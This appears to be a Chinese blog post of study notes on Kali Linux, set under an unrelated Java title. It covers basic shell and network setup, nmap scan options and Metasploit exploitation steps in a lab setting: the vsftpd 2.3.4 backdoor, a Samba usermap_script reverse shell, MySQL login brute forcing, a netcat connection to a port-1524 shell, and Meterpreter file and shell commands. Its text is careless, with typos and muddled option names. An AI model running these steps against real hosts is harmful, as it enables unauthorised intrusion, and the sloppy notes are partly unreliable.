java中的接口是类吗
464
2022-10-06
kali学习与指令总结(kali语法)
常用文件修改指令```1、复制命令 cp用法:# cp 源文件/目标文件夹 将源文件复制到目标文件夹下 如:cp 1.txt /root/2.txt将1.txt文件复制到root目录下2.txtcp -r 复制目录
2、删除命令 rm用法:rm 文件名 rm 1.txt 删除1.txt文件 rm - rf 强制删除文件夹
3、移动、重命名 mv用法:移动, mv 原文件 /目标文件夹 mv 1.txt /root/ 将1.txt移动到root目录下
4.touch user.txt 创建user文件
## Linux用户新建 ``` useradd -m username 更改用户名 passwd username更改用户名的密码 adduser usename 添加用户名 passwd [用户名] 更改密码 usermod -a -G sudo username -a 仅和-G一块使用,将用户添加到附属组群。 CTRL+Z 强制退出msfconsole工具中
设置kali的ip地址
vim /etc/network/interfaces 提取root权限 auto eth0 #开机自动激活 iface eth0 inet static #静态IP address 192.168.1.1 #本机IP netmask 255.255.255.0 #子网掩码 gateway 192.168.1.1 #网关 ------------------------------- /etc/init.d/networking restart 重启网卡服务
SSH远程连接服务
systemctl status ssh 先查看开启或未开的状态 systemctl start ssh 运行远程服务命令 systemctl enable ssh 设置为开机自启的命令 vim /etc/ssh/ssh_config vim是超级链接,etc目录 vim前后必须加空格 vi是普通文本 login 登录 prohibit 阻止 permit root login : prohibit-password 不将上面的命令改为yes,只能用dcn用户登录
kali工具介绍
nmap工具的使用
nmap 识别活跃主机 (网络安全扫描)
1.列举网络主机清单
2.管理服务升级调度
3.监控主机
4.服务运行状况
nmap扫描端口状况
-Open(开放的):应用程序正在这个端口上监听连接
-Closed(关闭的):端口对探测做出了响应,但是现在没有应用程序在监听这个端口。
-Filtered(过滤的):端口没有对探测做出响应,但是现在没有应用程序在监听这个端口
-Unfiltered(未被过滤的):端口对探测做出来响应,但是Nmap无法确定它们是关闭还是开放。
-Open/Filtered:端口被过滤或者是开放的,Nmap无法做出判断。
-Closed/Filtered:端口被过滤或者是关闭的,Nmap无法做出判断。
具体指令
指纹识别
nmap -sP //同于其他的扫描,他只扫描该网段下的端口,不是发现开放端口的
SYN半开放扫描
nmap -sS 1.1.1.1 tcp SYN Scan (sS) //这是一个基本的扫描方式,半开放式扫描因为这种技术使得 Namp不需要通过完整的握手能够获得远程主机的信息
nmap -sV 172.16.208.220 -ox 文件名.txt 将扫描的结果保存在文件名.txt(可以更换扫描方式)
nmap -v -sV 172.16.208.0/24 -oA subnet_1
nmap -sV //搜索服务版本信息
nmap -v //详细输出扫描情况
-oA //-oA将数据以图表的形式展现出来
subnet_1 //子网的意思
sT TCP扫描
nmap -O 1.1.1.1 //扫描目标操作系统
PN NO ping //扫描
nmap -O -PN 192.168.1.1/24
//如果远程主机有防火墙IDS和IPS系统你可以使用-PN命令来确保不ping远程主机因为有时候防火墙会组织掉ping请求,-PN命令 告诉Nmap不用ping远程主机
nmap -A OS //识别,版本探测,脚本扫描和traceroute综合扫描
NSE脚本扫描
nmap --script vuln
metasplit 在kali终端输入msfconsole 在kali里搜索searchsploit(精确搜索) 在msf将kali搜索下的漏洞加以搜索 输入指令 use unix/irc... info 查找信息 set rhost IP地址 run 运行 whoami 展示当前用户名 halt 立刻关机 reboot 立刻重启 back 返回msf工具 metasplit meterpreter Meterpreter是Metasploit框架中的一个杀手锏,通常作为利用漏洞后的进攻载荷所使用,双击载荷在触发漏洞后能够返回给一个控制通道 help:查看帮助信息 background:允许用户在后台Meterpreter会话 downland:允许用户从目标主机上下载文件 upload:允许用户上传文件到目标主机 shell:允许用户在目标主机上(仅是Windows主机)运行Windows shell命令 windows运行cmd命令 Linux运行daish session -i:允许用户切换会话 ps:用于捕获目标主机正在运行的任务进程 metasplit进行信息搜索(msf) 扫描内容/方法: nmap -v -sV 网络/掩码 -oA 文件名称 nmap -sV 搜索服务版本信息 nmap -v 详细输出扫描情况 -oA -oA将数据以图表的形式展现出来 扫描数据处理: cat subne_1.gnmap | grep 80/open | awk '{print $2}' 搜索这个文件中80端口的IP地址数 search portscan 端口扫描 cat /etc/passwd查找所有用户的列表 w 可以查找当前活跃的用户列表 cat /etc/group 查看用户组 userdel 用户 删除用户 userdel -f 连同用户目录一并删除 FTP漏洞扫描 search vsftp [vsftp]是FTPserver段上的服务[在2.3.4版本中有漏洞] FTP漏洞扫描 search ftp_version 查找ftp版本 {version版本} use exploit/unix/ftp/vsftpd_234_backdoor 搜索mysql数据库 use auxiliary/scanner/mysql/mysql_login 进入这个目录 touch user.txt 生成一个user.txt 创建一个user.txt 写入用户 创建另一个pass.txt 写入密码(随便写入) show options 显示配置 1.set rhosts 172.16.208.0 2.set threads 100 线程数为100 平时为单线程 3.set pass_user /home/dcn/pass/txt 4.set pass_FILE /home/dcn/pass/txt mysql -h 172.16.208.0 -uroot -p mysql -h 【-h选择主机】172.16.208.0 -uroot 【uroot提示无密码】 有密码后面加 -p metasploit samba 漏洞 扫描端口 nmap -sV -p 139 445 IP地址 探测目标端口服务版本信息 进入msfconsole 搜索脚本 search samba use exploit/multi/samba/usermap_script 配置对应的payload show payloads set payload cmd/unix/reverse set lhost 172.16.208.220 输入本机ip metasploit 弱口令 nmap -sV 172.16.208.215 探测目标IP的端口 nc 172.16.208.215 1524 (1524为端口号) metasploit php cgi 漏洞利用 nmap -sV -p80 172.16.1.1 cd /usrshare/nmap/scripts 进入这个目录之后 ls | grep php-version 筛选搜索这个脚本 在kaili上输入或在msfconsole控制台输入 nmap --script -p80 172.16.208.0 查找是否有符合的漏洞 use exploit/multi/进行漏洞利用 set rhost 172.16.208.1 exploit 之后进入meterperter会话 ? 可以观看可执行操作 进入这个模式就可以查看目录获取flag值 background 切到后台 sessions 回到先前控制台
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~